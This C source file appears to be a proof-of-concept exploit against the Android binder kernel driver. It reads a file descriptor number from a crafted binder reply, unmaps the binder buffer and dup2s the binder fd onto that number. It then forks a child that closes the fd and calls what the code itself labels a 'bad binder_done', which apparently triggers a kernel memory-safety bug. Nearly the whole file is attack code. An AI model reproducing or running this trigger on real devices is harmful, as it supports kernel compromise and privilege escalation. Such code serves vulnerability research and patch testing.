#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#include "binder.h"


uint32_t send_request(struct binder_state* bs) {
  struct binder_io msg;
  struct binder_io reply;
  char data[0x1000];
  uint32_t handle = 0;

  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0);
  binder_call(bs, &msg, &reply, 0, 1);
  printf("got reply!\n");

  if (reply.offs_avail == 0) errx(1, "didn't get offs");
  struct binder_buffer_object *obj = (void*)(reply.data0 + reply.offs0[0]);
  if (obj->hdr.type != BINDER_TYPE_PTR || obj->length != 4)
    errx(1, "didn't get binder ptr");
  int incoming_fd = *(int*)obj->buffer;
  printf("got binder ptr pointing to %d\n", incoming_fd);

  char cmd[100];
  sprintf(cmd, "ls -l /proc/%d/fd/%d", getpid(), incoming_fd);
  system(cmd);

  munmap(bs->mapped, bs->mapsize);
  bs->mapped = 0;
  if (dup2(bs->fd, incoming_fd) != incoming_fd) err(1, "dup2");
  close(bs->fd);
  bs->fd = incoming_fd;
  printf("forking\n");
  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    usleep(1500*1000);
    close(incoming_fd);
    exit(0);
  }
  printf("calling bad binder_done\n");
  binder_done(bs, &msg, &reply);
  printf("bad binder_done over\n");

  system(cmd);

  exit(0);
  /*
  handle = bio_get_ref(&reply);
  binder_acquire(bs, handle);
  binder_done(bs, &msg, &reply);
  */

  return handle;
}

int main(int argc, char** argv) {
  setbuf(stdout, NULL);

  struct binder_state* bs;

  fprintf(stderr, "[0] opening /dev/binder\n");
  bs = binder_open(0x400000);
  if (bs == NULL) err(1, "binder_open");

  send_request(bs);

  return 0;
}
